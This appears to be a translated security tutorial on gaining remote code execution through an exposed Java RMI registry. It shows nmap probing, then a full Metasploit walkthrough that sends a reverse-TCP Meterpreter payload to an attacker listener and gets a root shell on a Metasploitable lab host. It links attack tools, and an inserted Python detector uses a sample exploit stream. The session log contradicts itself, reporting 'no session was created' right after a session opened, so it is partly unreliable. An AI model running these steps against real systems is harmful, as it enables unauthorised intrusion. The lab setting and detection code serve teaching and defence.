Java RMI exploitation (ports 1099/1090 exposed externally: RCE)

Introduction to Java RMI

Java RMI stands for Remote Method Invocation. It is a mechanism that lets an object in one Java virtual machine invoke methods on an object in another Java virtual machine.

RMI is part of J2SE and lets programmers build Java-based distributed applications. An RMI object is a remote Java object whose methods can be invoked from another JVM (even across the network) exactly as if it were a local Java object, so objects spread across different JVMs look and behave like local ones.

For any RMI interface that takes an object as a parameter, you can send an object of your own construction and force the server to deserialize it as any serializable class present on its class path.

RMI transport is 100% based on deserialization. The default port is 1099.

Probing the target RMI service

Use nmap -sV -p 1099 <target IP> to detect the target's version information.

➜  ~ nmap -sV -p 1099 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 09:49 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00034s latency).

PORT     STATE SERVICE     VERSION
1099/tcp open  Java-rmi Java RMI Registry
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Service Info: Host: localhost

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.86 seconds


RMI remote command execution, method one:

Exploit the RMI RCE vulnerability with Metasploit.

1. Start msfconsole

➜  ~ msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v5.0.2-dev                           ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]


2. Use the exploit/multi/misc/java_rmi_server module

msf5 > use exploit/multi/misc/java_rmi_server
msf5 exploit(multi/misc/java_rmi_server) > set rhosts 10.0.2.5
rhosts => 10.0.2.5

3. Set the payload

msf5 exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(multi/misc/java_rmi_server) > set lhost 10.0.2.12
lhost => 10.0.2.12

4. Check the configuration

msf5 exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOSTS     10.0.2.5         yes       The target address range or CIDR identifier
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.12        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

5. Launch the exploit

msf5 exploit(multi/misc/java_rmi_server) > run 

[*] Started reverse TCP handler on 10.0.2.12:4444 
[*] 10.0.2.5:1099 - Using URL: http://0.0.0.0:8080/RTcs5fWbAmO91i
[*] 10.0.2.5:1099 - Local IP: http://192.168.1.34:8080/RTcs5fWbAmO91i
[*] 10.0.2.5:1099 - Server started.
[*] 10.0.2.5:1099 - Sending RMI Header...

[*] 10.0.2.5:1099 - Sending RMI Call...
[*] 10.0.2.5:1099 - Replied to request for payload JAR
[*] Sending stage (53845 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35676) at 2019-07-13 09:54:48 -0400

id
[-] 10.0.2.5:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 10.0.2.5:1099 - Server stopped.
[*] Exploit completed, but no session was created.

msf5 exploit(multi/misc/java_rmi_server) > sessions -l

Active sessions
===============

  Id  Name  Type                    Information            Connection
  --  ----  ----                    -----------            ----------
  1         meterpreter java/linux  root @ metasploitable  10.0.2.12:4444 -> 10.0.2.5:35676 (10.0.2.5)

msf5 exploit(multi/misc/java_rmi_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
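The Metasploit run above only succeeds because the target's RMI server follows the codebase URL embedded in the attacker's call and fetches the payload JAR from the module's HTTP listener (the "Replied to request for payload JAR" line). On the defensive side the same two artifacts can be matched in network traffic: the JRMI handshake that nmap -sV keyed on, and a Call message carrying a URL-valued serialized String. The following Python is an added example, not code from the post; the handshake bytes and serialization tags follow the Java RMI and serialization specifications, and the sample streams are constructed and simplified, not real captures.

```python
import struct

# Java RMI wire-protocol and serialization constants (from the RMI and Java serialization specs).
JRMI_MAGIC = b"JRMI"                      # transport header sent by every RMI client
RMI_VERSION = b"\x00\x02"
PROTOCOLS = {0x4B, 0x4C, 0x4D}            # StreamProtocol, SingleOpProtocol, MultiplexProtocol
RMI_CALL = 0x50                           # message type: remote call
STREAM_MAGIC = b"\xac\xed\x00\x05"        # start of an ObjectOutputStream
TC_STRING = 0x74                          # serialized String: 0x74, 2-byte length, modified UTF-8
CODEBASE_SCHEMES = (b"http://", b"https://", b"ftp://", b"file:")


def is_rmi_handshake(data: bytes) -> bool:
    """True if the first client bytes of a TCP stream are the JRMI handshake nmap -sV keyed on above."""
    return len(data) >= 7 and data[:4] == JRMI_MAGIC and data[4:6] == RMI_VERSION and data[6] in PROTOCOLS


def serialized_strings(payload: bytes):
    """Yield TC_STRING values from serialization data (heuristic byte scan, not a full parser)."""
    i = 0
    while i + 3 <= len(payload):
        if payload[i] == TC_STRING:
            (length,) = struct.unpack(">H", payload[i + 1:i + 3])
            value = payload[i + 3:i + 3 + length]
            if length and len(value) == length:
                yield value
                i += 3 + length
                continue
        i += 1


def find_codebase_urls(stream: bytes) -> list:
    """URLs carried as Strings inside RMI Call messages. The RMI marshal stream writes a class's
    codebase annotation as a String next to its class descriptor; that is how the server above was
    told where to fetch the payload JAR. A URL passed as an ordinary String argument also matches."""
    urls, pos = [], 0
    while (pos := stream.find(bytes([RMI_CALL]) + STREAM_MAGIC, pos)) >= 0:
        for s in serialized_strings(stream[pos + 5:]):
            if s.startswith(CODEBASE_SCHEMES):
                urls.append(s.decode("utf-8", "replace"))
        pos += 5
    return urls


def classify(stream: bytes) -> dict:
    """Verdict for one client->registry TCP stream."""
    rmi = is_rmi_handshake(stream)
    urls = find_codebase_urls(stream) if rmi else []
    return {"rmi": rmi, "remote_codebase": bool(urls), "codebase_urls": urls}


def _utf(s: bytes) -> bytes:              # length-prefixed string as written by writeUTF
    return struct.pack(">H", len(s)) + s

# Constructed sample streams (not real captures): handshake, client endpoint echo, one Call message.
_PREFIX = JRMI_MAGIC + RMI_VERSION + b"\x4b" + _utf(b"10.0.2.12") + struct.pack(">I", 0) \
    + bytes([RMI_CALL]) + STREAM_MAGIC + b"\x77\x22" + b"\x00" * 34        # block data: ObjID/op/hash zeroed
SAMPLE_EXPLOIT_STREAM = _PREFIX + b"\x73\x72" + _utf(b"evil.Exploit") + b"\x00" * 8 \
    + bytes([TC_STRING]) + _utf(b"http://203.0.113.5:8080/Xy1/")            # codebase annotation (TEST-NET host)
SAMPLE_BENIGN_STREAM = _PREFIX + bytes([TC_STRING]) + _utf(b"Calculator")  # plain lookup("Calculator") argument
```

Hosts running Java 7u21 or later ignore such codebase annotations by default (java.rmi.server.useCodebaseOnly=true), so this module fails against them; a flagged stream on an older JVM is a strong sign the registry should not have been reachable from the network at all.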

RMI remote command execution, method two

Download the tool directly: attackRMI.jar

GitHub repositories:
A-D-Team/attackRmi (github.com)
waderwu/attackRmi (github.com)
